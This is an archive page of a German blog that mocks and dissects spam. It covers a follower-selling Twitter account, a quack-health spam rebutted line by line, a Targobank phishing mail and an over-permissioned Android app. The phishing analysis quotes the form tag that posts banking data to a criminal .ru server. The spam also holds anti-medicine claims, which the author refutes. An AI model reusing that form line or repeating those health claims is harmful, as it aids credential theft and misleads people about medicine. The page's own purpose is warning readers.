Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Monatsarchiv für Juli 2015

Bųÿ Föĺĺöŵèŗś 1k=$12

Montag, 6. Juli 2015

Das ist der angezeigte Name zum Twitter-Account @WKLDQNYE – ich werde den dahinter stehenden Menschen im Folgenden einfach „Idiot“ nennen. Weils passt.

Der Idiot versteht ganz prächtig, Unicode-Zeichen so auszuwählen, dass ein menschlicher Leser noch bemerkt, was das Wort bedeuten soll – ein automatisches Verfahren zur Spambekämpfung jedoch, das hat da deutlich mehr Mühe. Dafür mangelts dem Idioten an anderen Dingen. Zum Beispiel hat er einen Twitter-Account, aber er hat darüber noch nie etwas auf dem intendierten Weg mitgeteilt, also in Form eines „Tweets“:

Screenshot des Twitter-Profiles von @WKLDQNYE

Stattdessen zieht es der Idiot vor, seine Kommunikation im angezeigten Namen und im gewählten Avatar zu betreiben. Wer dann immer noch nicht gemerkt hat, was dieser Idiot anzubieten hat, der findet in der Kurzbiografie darunter noch einmal etwas Text:

Im Avatar steht: '$12 1000 Twitter Followers' -- Der Name lautet 'Bųÿ Föĺĺöŵèŗś 1k=$12' -- Kurzbiografie: Buy 1000 real twitter followers for $12 -- Der Link ist unnötigerweise über bit.ly gekürzt

Natürlich hat der Idiot ohne technischen Grund seine „Homepage“ über bit (punkt) ly verschleiert – tatsächlich könnten an dieser Stelle ausreichend lange Links gesetzt werden. Auf der verlinkten Seite in der Domain hsocial (punkt) co (punkt) za können dann…

Screenshot der betrügerischen Website zum Kaufen von Twitter-Followern

…bis zu 74 Dollar klimper klimper Vorkasse gelegt werden, um Twitter-Follower zu kaufen. Das ist genau das richtige Angebot für Menschen, die es auch nötig haben, sich zur Masturbation selbst einen Orgasmus vorzuspielen. :mrgreen:

Und wer dann auch noch etwas gegen „safer sex“ hat, darf diesem Idioten auch gern seine Kreditkartendaten geben.

Nun ist es ja nicht so, dass jemand von allein auf ein derartiges Profil eines Idioten aufmerksam würde – es gibt ja viele ungenutzte Profile bei Twitter – und deshalb hat sich der Idiot einen tollen Trick ausgedacht, damit andere Twitter-Nutzer auch auf sein Profil aufmerksam werden. Er favorisiert einfach willkürlich die „Tweets“ anderer Leute. Die inhaltliche Gleichgültigkeit des Idioten zeigt sich darin, dass er dabei über sämtliche Sprach- und Kulturräume der Erde hinweg willkürlich irgendetwas favorisiert. Der so Favorisierte sieht dann in seiner Twitter-Software oder seiner Timeline, von welchem Idioten er favorisiert wurde, und zwar mit Avatar und Anzeige des „Namens“. Wenn er Interesse hat, so sagt sich der Idiot, dann wird er den einen Klick auch noch hinbekommen.

Nun gut. Eben ein Idiot auf Twitter.

Aber ich möchte den ganzen Twitternutzer_innen angesichts solcher Idioten zurufen: Die Funktion, jemanden als Spammer zu melden, ist genau für solche Idioten gemacht worden und nicht etwa dafür, andersdenkende Menschen mit Verabredungen und über pastebin (punkt) com geteilten Blockierlisten von Twitter wegzubeißen. Ganz im Gegenteil: Mit eurem Missbrauch der Spammeldefunktion erschwert ihr die Spambekämpfung auf Seiten Twitters und schafft ein Biotop, in dem solche Idioten groß werden können. Ja, ihr qualifiziert euch damit selbst als Idioten und Freund_innen der völlig hirnlosen Spam.

Und wenn ihr das wollt, dann wächst mit euch und solchen Idioten ja zusammen, was zusammen gehört…

Gesunheit, Krebs und was uns alle erwartet

Sonntag, 5. Juli 2015

Na ja, wenigstens ist „Krebs“ richtig geschrieben, bei „Gesundheit“ scheints ja nicht so drauf anzukommen… :mrgreen:

Diese Spam für gefährliche Quacksalberei zeichnet sich nicht so sehr durch beeindruckende Argumente, aber dafür durch beeindruckende Länge aus. Sie lag bei mir im Honigtopf. Diese Spam kommt also an jede Adresse an, die diese Halunken mit ihrem Skript irgendwie im Internet automatisch einsammeln können. Die für Menschen leicht und Skripte schwer lesbare Mailadresse aus dem Impressum wurde jedenfalls nicht damit zugemüllt.

Hey,

Genau mein Name!

mit meiner heutigen Email möchte ich aus aktuellem Anlass ein sehr sensibles Thema ansprechen: Unsere Gesundheit

Ein krimineller Spammer ist echt die letzte Gestalt, der ich meine Gesundheit anvertrauen würde. Da kann ich auch gleich zum Bestatter gehen. 😈

Vor wenigen Tagen ist eine enge Familienangehörige von mir im Alter von nur 59 Jahren völlig überraschend an Krebs gestorben.

Es ist selten, dass jemand überraschend an Krebs stirbt, denn es handelt sich oft um ein langes, übles Verrecken. Was für ein Krebs war es denn? Ach, irrelevant. Krebs eben. Du willst ja Quacksalberei verkaufen, die gegen alles hilft.

Im Raum stehen die Fragen „Warum nur?“ und „Hätte das vermieden werden können?“.

Fragen, auf die die Kirchen, Sektierer und sonstigen Verdächtigen gern vorgestanzte Antworten verkaufen, deren Richtigkeit sich regelmäßig erst feststellen lässt, wenn es schon zu spät ist. Ein gutes Geschäft, an dem du dich offenbar beteiligen willst.

Weißt du, mein persönliches Ziel ist es 100 Jahre alt zu werden und mein ganzes Leben gesund zu bleiben…

Weißt du, was mein persönliches Ziel ist? Dass Gestalten wie du gar nicht erst geboren werden; und wenn doch mal eine kommt, dass Gestalten wie du für jede einzelne verdammte, intelligenz- und menschenverachtende Spam einen Tauchsieder in den Anus eingeführt bekommen.

Für viele scheint das total verrückt zu klingen.

Irgendwie unrealistisch…

Für viele scheint das… ach, weißt schon. 😀

NEIN, das ist es nicht!

Aber irgendwann kriege ich mal einen Typen wie dich in die Finger, und dann kriegst du zurück, was du den anderen Menschen gegeben hast.

Es ist realistisch alt zu werden und dabei gesund zu bleiben!

Nur mit dem Geld scheint es dann noch nicht zu klappen, und deshalb bist du Spammer geworden. Ich verstehe.

Ich möchte dir auch verraten, wieso?

Weil die meisten Krankheiten, die wir im Laufe eines Lebens bekommen, meiner Meinung nach aus 2 Gründen entstehen:

Aha, nach deiner Meinung. Die du beleglos rausspammst. Ich weiß ja nicht, wie du zu deiner Meinung gekommen bist, aber richtige medizinische Studien sind mir da wesentlich lieber.

Grund Nummer #1: Genetik

Ja, es stimmt, dass Mutter Natur vorbestimmt, welche Krankheiten wir haben oder bekommen.

So so, in den Genen liegen also von Rabenmutter Natur vorbestimmt die Krankheiten, die ich bekomme… nun ja, ein bisschen stimmt das. Aber zur Disposition muss in den meisten Fällen noch ein weiterer Einfluss dazukommen.

Jetzt kommt das grosse Aber!

David B. Agus schreibt in seinem Buch „Leben ohne Krankheiten“, dass nur ein Bruchteil der heutigen Erkrankungen auf unsere Genetik zurückzuführen ist!

In der Tat, da hat er recht, der Herr Bestsellerautor. Stell dich in der BRD in die Nähe einer Tankstelle und atme ständig Benzol ein, oder setz dich energiereicher Gammastrahlung aus, und die besten Gene nützen gar nix, weil du dein Krebsrisiko trotzdem erhöhst.

Das Verrückte ist: In jedem Menschen bilden sich jeden Tag Krebszellen (oder andere Erkrankungen).

Bei dem einen richten sie sich gegen den Körper, bei dem anderen passiert nichts!

Warum?

Wow, du schreibst, als würdest du gerade das menschliche Immunsystem entdecken. Du musst ja echt ein Spezialexperte von ganz großer Knalligkeit sein. Jeden Tag wird mein Körper überrannt von hässlichen kleinen Biestern, die kein Gehirn haben und – im Falle von Viren – noch nicht einmal einen Stoffwechsel; die mich hacken und pwnen können, dass ich nur so krank werde. Aber die kleinen Armeen in meinem Körper stehen bereit und halten die (letztlich aussichtslose) Position in einer opferreichen Schlacht.

Übrigens ist es vollkommen egal, warum Menschen im Regelfall nicht krank werden. Die Aufgabe einer medizinischen Methode ist es, den Kranken zu behandeln, im Gesundwerden zu unterstützen und wenn das alles nicht mehr geht, ihm das Leben mit seiner Krankheit erträglich zu machen. Du ziehst dir gerade beim Verkaufen von irgendwelchem Schlangenöl ein Argument aus dem Arsch, das nichts mit deinem zuvor zur Erhöhung der psychischen Wucht angeführten Thema zu tun hat. Deine kürzlich total plötzlich mit 59 Jahren an Krebs verstorbene Angehörige ist ja nicht daran gestorben, dass andere keinen Krebs kriegen; nein, sie starb daran, dass sie Krebs hatte.

Wenn aber dein in einer Spam angepriesenes Schlangenöl, du menschenverachtender Spammer, dazu führt, dass Menschen sterben, weil sie sich darauf verlassen haben, dann bist du ihr Mörder. Und wie Menschen sterben, die von Gestalten wie dir ermordet werden, das kannst du zum Beispiel in diesem Bericht der Gattin eines Heilpraktikers nachlesen. Man muss schon sehr böse, empathieunfähig und arschlochhaft sein, um mit dem vermeidbaren elenden Verrecken anderer Menschen Geld zu verdienen. Du bist so böse, empathieunfähig und arschlochhaft! Ich verachte dich.

Und hier kommen wir zu:

Grund Nummer #2:

Unser eigenes Handeln (oder nicht Handeln)

Wie wir uns ernähren, wie wir uns verhalten, wie wir arbeiten, wie viel Stress wir haben, wie viel wir uns bewegen, wie glücklich wir sind und so weiter, bestimmt über unsere Gesundheit.

In der Tat. Lebe als Tankwart, und du erhöhst dein Risiko für Hodenkrebs. Rauch, und du erhöhst dein Risiko für Lungenkrebs. Ernähr dich nach irgendwelchen Ernährungsratgebern von Angsthausierern, und du erhöhst dein Risiko, mitten im Überfluss einer reichen Gesellschaft Mangelerscheinungen auszubilden.

Solange wir gesund sind, ist alles ok, oder!?

Aus der Sicht eines Menschen, der Krankheit lindert oder heilt, also eines so genannten Arztes: ja. Aus der Sicht eines Menschen, der Angst machen will, um Zeugs zu verkaufen: nein.

Und sollten wir dann doch einmal krank werden, wird unser Arzt es schon richten, oder?

Na ja, manchmal. 🙁

Falsch!

Deshalb gibt es zum Beispiel auch eine Reihe sehr guter und wirksamer und in nachvollziehbaren Studien belegbarer medizinischer Verfahren, die die Entstehung von Krankheit nachweisbar verhindern. Impfungen zum Beispiel, das vermutlich derzeit beste medizinische Verfahren. Sogar die Pocken, die vor noch gar nicht so langer Zeit wie eine schwarze Hand in die Menschheit griffen, um Millionen von Menschen aus dem Leben zu reißen, wurden damit ausgerottet. Was für ein Segen!

Das war übrigens das Werk von Ärzten. Nicht von Quacksalbern.

Unser Arzt richtet gar nichts, denn er lindert meist nur die Symptome und nicht die Ursachen. Vielleicht kennst du das auch?

Du gehst zum Arzt, hast Schmerzen und der Arzt findet nichts oder zuckt mit den Schultern und kann dir nicht helfen…

Und dann macht der Arzt etwas, was du nicht kannst: Er gibt dir wirksame Schmerzmittel, die es dir wieder möglich machen, qualfrei zu leben. Man muss schon sehr kalt sein, wenn man das als „nicht helfen können“ zusammenfasst.

Vor einigen Jahren hatte ich beispielsweise richtig fiese Rückenschmerzen.

Mein Arzt untersuchte mich, fand nichts und schrieb mich 2 Wochen krank…

Damit war er durch mit mir… Toll!

So ein Symptom wie Rückenschmerzen kann verdammt viele Ursachen haben und hat einen beachtlichen psychosomatischen Anteil – und bei vielen Menschen wirkt eine kurze Ruhepause geradezu ein kleines Wunder. Sei doch froh, dass er bei dir keinen Krebs gefunden hat und dich nicht ins Krankenhaus überwiesen hat!

Glücklicherweise fand ich selbst heraus, woran es lag und das musste nicht mit Medikamenten behandelt werden. Ich stellte nur meine Sitzhaltung beim Arbeiten um, denn ich hatte eine massive, muskuläre Dysbalance zwischen Rücken und Bauch.

Siehst du: Kaum bist du mal für zwei Wochen draußen aus deinem Trott, schon fängt das Gehirn wieder an zu arbeiten, es entsteht Bewusstsein und du brauchst nicht einmal Pillen zu schlucken. Wenn Ärzte wirklich ein Gefühl für ihre Verantwortung hätten, müssten sie vermutlich mindestens der Hälfte ihrer Patienten sagen, dass sie von ihrer Arbeit und den dabei erzwungenen körperlichen und geistigen Haltungen krank werden und ihnen empfehlen, mit dem Arbeiten aufzuhören. Der Job eines Arztes ist aber (leider) ein anderer, er soll die Verwertbarkeit des Menschen im betrieblichen Produktionsprozess erhalten, die dann kurzerhand als „Gesundheit“ betrachtet und bezeichnet wird.

Mit meiner heutigen Mail möchte ich in dir das Bewusstsein für deine eigene Gesundheit schärfen und dich aufmerksamer für deinen Körper machen.

Es ist Dein Körper und es ist Deine Gesundheit.

Das ist ja auch der Grund, weshalb ich mir von einem Spam-Quacksalber niemals etwas andrehen ließe.

Du hast nur diesen einen und solltest ihn hegen und pflegen!

Zum Glück habe ich wenigstens mein Hirn recht gut gepflegt, es erweist sich heute, wo der Körper nur noch unwillig für mich da ist, als recht hilfreich. Zum Beispiel, um nicht auf jeden Schwindel reinzufallen.

DU solltest, nein MUSST, die Verantwortung für deinen Körper und deine Gesundheit übernehmen, sonst wird es die Pharmaindustrie tun und dich dein Leben lang mit Medikamenten füttern.

Und, was hast du gegen Medikamente? Ich nehme keine, und ich bin verdammt froh, dass ich keine nehmen muss. Ich kenne Menschen, die sind verdammt froh, dass sie mithilfe wirksamer Medikamente leben können, oft mit erheblich geringerem Leiden. Für einen Quacksalber wie dich…

Boah, diese Vorstellung ist schrecklich…

…ist das natürlich eine schreckliche Vorstellung. Es beeinträchtigt nämlich deine Geschäftsidee. Menschen hingegen, die unter unbehandelten Leiden verrecken, stören dich nicht, die wachsen ja immer wieder nach, weil die Mutter der Naiven jeden Tag schwanger ist.

Vor ein paar Tagen bin ich durch eine sehr kontroverse Präsentation auf dieses Thema aufmerksam geworden.

Um was es in dieser „Präsentation“ geht, schreibst du aber lieber nicht, weil dein Sondermüll sonst von jedem Spamfilter aussortiert würde. Ich bedanke mich übrigens bei Vimeo dafür, dass der für andere Menschen lebensgefährliche Sondermüll auf deiner tollen Website nicht mehr sichtbar ist und hoffe, das bleibt noch lange so.

Ich bin niemand, der Verschwörungs-Theorien mag, aber mich hat diese Präsentation zum Nachdenken angeregt:

Klingt ein bisschen wie: Ich bin ja kein Ausländerfeind, aber… :mrgreen:

- Sind wir wirklich von der Pharmaindustrie abhängig? -

- Wollen unsere Ätze [sic!] uns nicht helfen oder können sie es nicht? -

- Müssen wir krank sterben oder können wir gesund leben? -

Nun, ich kann dir deine Fragen beantworten.

  1. Nein, wir sind nicht von der Pharmaindustrie abhängig. Aber es ist gut, industriell hergestellte Wirkstoffe in hoher Qualität zur Verfügung zu haben. (Es ist hingegen weniger gut, dass dies zurzeit der kapitalistischen Mordwirtschaft eingebettet ist und zu einem mörderischen Geschäft geworden ist. Diese Gesellschaftsform zu überwinden wird allerdings nicht mit Quacksalberei gelingen, sondern nur mit einer Revolution.)
  2. Ärzte kommen zuweilen ans Ende ihrer Möglichkeiten. Menschen sind sterblich. Echt. Unvermeidlich. Du auch. Sogar ich. Kannste nix gegen machen. Ist auch eine Riesensauerei, wenn du mich fragst. Die Möglichkeiten eines Arztes haben sich in den letzten rd. hundert Jahren allerdings erheblich ausgeweitet. Dies geschah nicht durch Quacksalberei, sondern durch evidenzbasierte Medizin, die von systematischer Forschung (und gelegentlichen sehr üblen Skandalen) begleitet wurde und wird. Du mit deiner Quacksalberei baust aber eher auf eminenzbasierte Medizin, und deshalb willst du das alles wegwerfen, um deinen Kram verkaufen zu können und davon zu leben, dass andere Menschen unter unbehandelten Krankheiten leiden und verrecken.
  3. Nein, du kannst auch gesund sterben oder krank leben. :mrgreen:

Bevor du dir die folgende Präsentation ansiehst, möchte ich dass du weißt, dass das nicht meine Webseite ist und dass ich diese Leute nicht kenne.

Nein, du spammst nur für diese Leute jeden Honigtopf voll, den man dir hinstellt. Du hast nix damit zu tun. Das ist fast so glaubwürdig wie dein medi-zynisches Fachwissen!

Schaue dir alles an, wenn du gesund werden und bleiben möchtest!

Wie, vom Anschauen wird man schon gesund?! :mrgreen:

Und ich dachte schon, dafür müsste man auch noch Quacksalberprodukte kaufen und in sich reintun…

Auf dieser etwas komisch wirkenden Webseite findest du die Präsentation, von der ich die ganze Zeit rede:

http://www.krankheiten-verlieren.com/

Nun, wenn du als Autor komischer (oder besser: intelligenzverachtender) Spams schon schreibst, dass die Website „komisch“ ist…

Ich würde mir jedenfalls eher einen guten Clown anschauen. Lachen soll ja auch gesund sein.

Ich hoffe die Pharmaindustrie findet diese Präsentation nicht so schnell, sonst wird es die wertvollen Informationen darin bald nicht mehr geben…

Weil das ist ja klar: Die Pharmaindustrie zensiert das Internet. 😀

Mann oh mann oh mann… was für ein Bullshit!

In meiner nächsten Email kehre ich zurück zu bahnbrechenden Infos für alle die ohne Beschwerden durch die Heuschnupfensaison kommen wollen.

Ich habe dich übrigens nicht um E-Mail gebeten. Du sendest die einfach zu jeder Adresse, die du irgendwie aus dem Internet einsammeln kannst. Von daher bin ich auch nicht…

Du darfst gespannt sein!

…gespannt, sondern schon von deiner ersten Scheißspam genervt. Und wenn ich Fragen zu Gesundheitsthemen habe, wäre eine illegale und asoziale Spam so ziemlich das letzte, worauf ich mich verlassen würde.

Für deine Gesundheit und bis bald

Beste Grüße

Rudi

Du kannst mich auch mal!

PS: Ich wünschte unsere Familie hätte diese Präsentation schon eher gesehen… dann wäre der plötzliche so schmerzhafte Verlust einer geliebten Person vielleicht zu verhindern gewesen…

PS: Ich wünschte, du würdest irgendwelches Quacksalber-Gift selbst in dich reinkippen, dann kehrte vielleicht bald Ruhe vor dir in den Postfächern ein. Aber du ziehst es ja vor, davon zu leben, dass andere das tun.

Targobank – Datenabgleich

Samstag, 4. Juli 2015

Aber ich bin da doch gar nicht Kunde. 😉

Absender: Targobank <direkt (at) targobank (punkt) de>

Dieser Absender ist gefälscht. (Jeder Absender in einer Spam ist gefälscht.) Diese E-Mail kommt nicht von der Targobank.

Screenshot der Darstellung der HTML-formatierten Spam in der Mailsoftware

Hui, Design!

Ich halte diese Phishing-Spam für gefährlich, weil sie überdurchschnittlich gut gemacht ist. Wer Kunde bei der Targobank ist und darauf reingefallen ist, sollte sich sofort mit der Bank in Verbindung setzen, um den Schaden zu minimieren.

Sehr geehrte Damen und Herren,

Genau mein Name! :mrgreen:

Eine richtige Bank würde ihre Kunden natürlich mit Namen ansprechen, und weil gar nicht so wenige Kunden mehrere Konten haben, würde sie auch noch erwähnen, auf welches Konto sich die Mail bezieht.

Ein Spammer kann im Allgemeinen – wenn er nicht aus einem Hack oder anderen Quellen eine Zuordnung von Mailadressen zu Bankdaten hat – nicht wissen, welche Kontonummer seine Empfänger haben. Ein vorsichtiger Umgang mit Bankdaten und die Verwendung einer eigenen E-Mail-Adresse ausschließlich für die Kommunikation mit der Bank sind ein wichtiger und sehr wirksamer Schutz gegen Phishing.

unser System hat festgestellt das Ihr Telefon-Banking PIN aus Sicherheitsgründen geändert werden muss.

Da bin ich aber froh, dass „euer System“ nicht festgestellt hat, dass ich ohne Grund 20.000 Øre berappen muss! :mrgreen:

Bitte nutzen das unten angefügte Formular um die Änderung Ihres Telefon-Banking PIN kostenfrei zu ändern.

Das „unten angefügte Formular“ ist eine an die Spam angehängte HTML-Datei, die im Browser so aussehen würde¹:

Screenshot der Darstellung des Anhangs der Targobank-Phishing-Mail in einem Webbrowser

Das Wichtigste daran ist, wo die eingegebenen Daten hingehen. Diese Frage beantwortet sich leicht durch einen Blick in den Quelltext der HTML-Datei:

<form [...] method="POST" action="http://a.dbbanking.ru/de/targo/login/targo.php"  >

Die Daten gehen also nicht zum Server der Targobank, sondern zum Server unter der von Kriminellen kontrollierten, russischen Domain a (punkt) dbbanking (punkt) ru. Das ist auch der Grund, weshalb man der „Targobank“ so viele Dinge sagen soll, die die richtige Targobank längst kennt, wenn man dort Kunde ist, zum Beispiel die eigene Kontonummer. Allein die hier angegebenen Daten reichen für die Übernahme des Kontos durch die Kriminellen, und ich bin mir sicher, dass nach dem Absenden noch weitere Daten für eine angebliche „Sicherheitsprüfung“ abgefragt werden – sehr beliebt sind wegen ihrer „vielseitigen kriminellen Verwendbarkeit“ Kreditkartendaten.

(Hinweis: Andernfalls belasten wir Ihr Konto mit 18,99€ und fordern die Änderung schriftlich über den Postweg bei Ihnen an.)

Damit ein Mensch auch so wirklich doof wird, darauf reinzufallen, wird er mit technokratischen Entgelt-Forderungen gefügig gemacht – so frei nach dem Motto: „Wir haben ein Sicherheitsproblem, zahlen sie bitte grundlos zwanzig Euro. Die Gebührentabelle, nach der wir dieses Geld erheben, haben wir uns einfach aus dem Hintern gezogen“.

Es handelt sich übrigens um langsame Verbrecher:

Ihren Telefon-Banking PIN können sie hier, oder wie folgt ändern:

1. Öffnen Sie die Datei im Anhang Ihrer Email und wählen Sie „öffnen mit“ aus.
2. Füllen Sie alle vorgesehenden Felder aus und klicken dann auf „Daten absenden“..
3. Ihr Telefon-Banking PIN aktiviert sich nach 5-7 Werktagen.

Die brauchen fast eine Woche, bis sie alles aus dem Konto rausgeholt haben, was sie rausholen wollen.

Für weitere Fragen ist unser Online Support unter: direkt (strich) pin (at) targobank (punkt) de 24Std. für Sie erreichbar.

Was, die sind nur 24 Stunden erreichbar? Und wenn die Frage einen Tag später kommt, hat man eben Pech gehabt? Tja, so etwas kommt raus, wenn die Phisher in Sprachen schreiben, deren Subtilitäten sie nicht verstehen. Ein Autor, der Deutsch kann, hätte „rund um die Uhr“ geschrieben und nicht das irreführende Ergebnis aus einer Computerübersetzung verwendet.

Es ist wieder einmal wie so oft bei den Phishing-Spams: Wenn der eigentliche Phishing-Kram formuliert ist, werden die Spammer oft ein wenig nachlässig und ihnen passieren kleine und zuweilen auch große und sehr peinliche Fehler. Wer sich nicht in Panik versetzen lässt (Sicherheitsmaßnahme der Bank, das wird teuer, wenn ich nicht reagiere) und gründlich liest, wird beinahe jede Phishing-Spam an solchen Details erkennen.

Targobank AG & Co. KG
Kasernenstr. 10
40213 Düsseldorf

Ihre Targobank

Wer es jetzt immer noch nicht bemerkt hat: Die Targobank hat mit dieser Spam nichts zu tun. Es ist eine Mail von Verbrechern, die ihre kriminellen Geschäfte mit fremden Konten machen wollen und die das Geld anderer Leute bei Koks und Nutten verprassen wollen.

Beratungstermin kostenlos unter:
info (at) targobank (punkt) de

Copyright © 2013 TARGOBANK

Oh, eine Mail von 2013 diente den Spammern als Vorlage… 😉

¹Ich rate strikt davon ab, Anhänge aus Spams zu öffnen, wenn man nicht weiß, wie man ein gut gesichertes System herstellt. Ein Virenscanner und eine „personal firewall“ machen kein gut gesichertes System. Das bisschen befriedigte Neugierde ist den möglichen Ärger niemals wert.

Diese Spam ist ein Zustecksel meines Lesers M.S.

Android Detect Calls FREE, enjoy our limited offer!

Donnerstag, 2. Juli 2015

Wie, klingelt das Telefon jetzt etwa, wenn man angerufen wird? Ist ja toll, dass es das völlig freibier gibt und dass ich mich an diesem in jedem Sinne des Wortes beschränkten Angebot erfreuen kann!

Detect Calls FREE, limited offer!

When your phone rings, this brilliant app shows you extra information about the phonenumber. Along with the country details, information about the city and state is provided.

Click To Install

Click Here To Unsubscribe

Aber nein, es ist viel toller! Diese E-Mail, die übrigens an jede Adresse gesendet wird, die irgendwo im Internet gefunden werden kann und nicht bei drei auf den Bäumen ist, hat eine App anzubieten. Eine brillante App. Die zeigt zusätzliche Infos an, wenn jemand anruft. Die leuchtet geradezu in die geistige Umnachtung hinein. Die ist so toll, dass die Leute, die sie gemacht haben, glauben, dass sie nur mit illegaler und asozialer Spam weggeht, diese juwelenhaft gleißende App.

Der Link enthält die E-Mail-Adresse als URI-Parameter, so dass zu den Spammern zurückgefunkt wird, welche Leute in die Spam klicken. Nachdem die unendlich wichtige Aufgabe erledigt wurde, Spammern mitzuteilen, wer alles in eine Spam klickt¹, gibts eine einfache Weiterleitung in den Google Playstore². Dort kann man sich den gnadenvollen Code von Spammern appholen, der bei jedem eingehenden Anruf folgende Infos anzeigt:

  1. Den Namen des Landes, aus dem angerufen wurde
  2. Die Telefonnummer
  3. Die Länderkennung nach ISO 3166 (es wird also für Anrufe aus der Bundesrepublik Deutschland „de“ angezeigt)
  4. Das Kfz-Kennzeichen des Anrufers, aber diese Daten sind unvollständig
  5. Die Hauptstadt des Landes, aus dem angerufen wurde

Also völlig brillante und unentbehrliche Informationen, bei denen sich wohl kaum jemand vorstellen kann, wie es so lange möglich war, ohne zu leben. :mrgreen:

Welche „Zusatzfunktionen“ diese Software für einen persönlich genutzten Computer hat, der weit in die Privatsphäre hineinragt, wird allerdings nicht genannt. Unter „Berechtigungen“ sind im Playstore folgende Punkte aufgelistet:

  • Geräte & App-Verlauf
    • Systeminternen Status abrufen
    • Aktive Apps abrufen [Wozu?]
    • Vertrauliche Protokolldaten lesen [Oops!]
    • Lesezeichen für Webseiten und das Webprotokoll lesen
  • Einstellungen für Mobilfunkdaten
    • Netzwerkeinstellungen und -verkehr ändern/abfangen [Aha, das scheint mir hier die „eigentliche“ Funktion zu sein…]
  • Identität
    • Konten auf dem Gerät suchen
    • Konten hinzufügen oder entfernen
    • Kontaktkarten lesen
    • Ihre Kontaktkarten ändern [Was zum Henker?!]
  • Kalender
    • Kalendertermine sowie vertrauliche Informationen lesen
    • Ohne Wissen der Eigentümer Kalendertermine hinzufügen oder ändern und E-Mails an Gäste senden [Also spammen!]
  • Kontakte
    • Ungefährer Standort (netzwerkbasiert)
    • Genauer Standort (GPS- und netzwerkbasiert)
    • Auf zusätzliche Standortanbieterbefehle zugreifen
  • SMS
    • SMS senden [Na, Lust auf teure „Premium-Dienste“? Oder Lust, dafür zu zahlen, dass man von Spammern ferngesteuert SMS-Spam an sein ganzes Adressbuch sendet?]
    • SMS oder MMS lesen
    • MMS empfangen
    • SMS empfangen
    • WAP-Nachrichten empfangen
    • SMS oder MMS bearbeiten
  • Telefon
    • Ausgehende Anrufe umleiten [!]
    • Telefonnummern direkt anrufen [für nur noch 9 Øre die Minute]
    • Telefonstatus ändern
    • Alle Telefonnummern direkt anrufen
    • Anrufliste lesen
    • Anrufliste bearbeiten [Also: Spuren verwischen]
  • Fotos/Medien/Dateien
    • USB-Speicherinhalte ändern oder löschen
    • USB-Speicher löschen
    • Auf Dateisystem des USB-Speichers zugreifen
    • USB-Speicherinhalte lesen
  • Kamera
    • Bilder und Videos aufnehmen [Was zum hl. Henker?!]
  • Mikrofon
    • Audio aufnehmen [Das wird ja unbedingt benötigt, um rauszukriegen, wer einen gerade anruft…]
  • WLAN-Verbindungsinformationen
    • WLAN-Verbindungen abrufen
  • Geräte-ID & Anrufinformationen
    • Telefonstatus und Identät abrufen
  • Sonstige
    • Auf Check-in-Eigenschaften zugreifen
    • Auf SurfaceFlinger zugreifen
    • Widgets auswählen
    • Mit einem Geräteadministrator interagieren
    • An eine Eingabemethode binden [Keylogging?]
    • An einen Widget-Dienst binden
    • An einen Hintergrund binden
    • Gerät dauerhaft deaktivieren [Und gegen Zahlung von hundert Tacken über Western Union wieder aktivieren?]
    • Broadcast ohne Paket senden [lokales Netzwerk durchtesten?]
    • Per SMS empfangenen Broadcast senden [fernsteuern?]
    • Von WAP-PUSH empfangenen Broadcast senden
    • App-Komponenten aktivieren oder deaktivieren
    • Daten anderer Apps löschen [!]
    • Benachrichtigung für Standortaktualisierung steuern
    • Caches anderer Apps löschen [!]
    • Apps löschen [!]
    • Gerät ein- oder ausschalten
    • Lese-/Schreibberechtigung für zur Diagnosegruppe gehörige Elemente
    • Im Werkstestmodus ausführen
    • Schließen der App erzwingen
    • Hardware testen
    • Tasten und Steuerungstasten drücken [!]
    • Berechtigung zur Installtion eines Standortanbieters
    • Apps direkt installieren [Wäre ja auch schade, wenn da nur eine komische App auf dem Wischofon landet…]
    • Nicht autorisierte Fenster anzeigen
    • App-Tokens verwalten
    • System auf Werkseinstellungen zurücksetzen [also „plattmachen“]
    • Frame-Puffer lesen
    • Tastatureingaben und Aktionen aufzeichnen
    • Synchronisierungsstatistiken lesen
    • Neustart des Geräts erzwingen
    • Andere Apps schließen
    • Start von Apps überwachen und steuern [Fernsteuerung?]
    • Bildschirmausrichtung ändern
    • Zeigergeschwindigkeit ändern [Wozu?!]
    • Zeit einstellen [Wozu?]
    • Größe des Hintergrundbildes anpassen
    • Statusleiste deaktivieren oder ändern
    • Abonnierte Feeds lesen
    • Akku-Daten ändern
    • Karte der Google-Dienste ändern
    • Sicherheitseinstellungen für das System ändern [!]
    • An eine Bedienungshilfe binden
    • An einen Textdienst binden
    • An einen VPN-Dienst binden
    • In sozialem Stream lesen
    • In sozialen Stream schreiben [und spammen?]
    • Zugriff auf alle Netzwerke [!]
    • Über anderen Apps einblenden [und damit andere Apps blockieren]
    • Netzwerkverbindungen abrufen
    • Netzwerkkonnektivität ändern
    • Verknüpfungen installieren
    • Verknüpfungen deinstallieren
    • Beim Start ausführen
    • Simulierte Standortquellen für Testzwecke
    • Als Konto-Manager fungieren [!]
    • Konten erstellen und Passwörter festlegen [!]
    • Akkudaten lesen
    • Pairing mit Bluetooth-Geräten durchführen
    • Auf Bluetooth-Einstellungen zugreifen
    • Dauerhaften Broadcast senden
    • System-Anzeigeeinstellungen ändern
    • WLAN-Multicast-Empfang zulassen
    • WLAN-Verbindungen herstellen und trennen
    • Alle Cache-Daten der App löschen
    • Bildschirmsperre deaktivieren
    • Statusleiste ein-/ausblenden
    • Lichtanzeige steuern
    • Speicherplatz der App ermitteln
    • Andere Apps schließen [Wozu?]
    • Audio-Einstellungen ändern
    • Nahfeldkommunikation steuern
    • Aktive Apps neu ordnen
    • Apps in Hintergrund schließen
    • Allgemeine Animationsgeschwindigkeit einstellen
    • Fehlerbeseitigung für App aktivieren
    • Anzahl der laufenden Prozesse beschränken [auf Null?]
    • Zeitzone festlegen [Wozu?]
    • Hintergrund festlegen
    • Linux-Signale an Apps senden
    • Konten auf dem Gerät verwenden
    • SIP-Anrufe tätigen/empfangen
    • Vibrationsalarm steuern
    • Ruhezustand deaktivieren
    • Systemeinstellungen ändern
    • Synchonisierung aktivieren oder deaktivieren
    • App permanent ausführen
    • Begriffe lesen, die Sie zum Wörterbich hinzugefügt haben [Wozu?]
    • Wecker stellen [Braucht man unbedingt, wenn man die Nummer eines Anrufers anzeigen will]
    • Bevorzugte Apps festlegen
    • Lesezeichen für Webseiten setzen und das Webprotokoll aufzeichnen [also umfassenden Tracking der Webnutzung machen]
    • Wörter zu meinem Wörterbuch hinzufügen

😯

